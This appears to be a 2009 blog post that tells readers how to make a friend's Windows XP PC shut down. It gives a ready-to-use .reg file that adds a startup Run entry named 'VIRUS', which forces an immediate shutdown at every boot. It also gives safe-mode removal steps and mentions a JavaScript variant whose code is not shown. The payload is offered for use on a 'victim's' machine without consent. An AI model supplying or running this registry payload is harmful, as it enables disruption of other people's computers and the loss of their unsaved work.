Making Your Friend's PC Shutdown
Posted by SantY in Internet Tips, Registry Tweaks, Windows XP on Friday, August 14, 2009
Making Your Friend's PC Shutdown :
Put this following text in a .reg file and run it in the victims pc:
************************************************************************************
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\W
indows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"
************************************************************************************
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.
You can also put this in a javascript code, just add this code to your webpage:
Be careful, a drawback of the js code is that NORTON ANTIVIRUS's script blocking feature may block this.
This entry was posted on Friday, August 14, 2009 at 11:36 AM and is filed under Internet Tips, Registry Tweaks, Windows XP. You can follow any responses to this entry through the RSS 2.0. You can leave a response.
- No comments yet.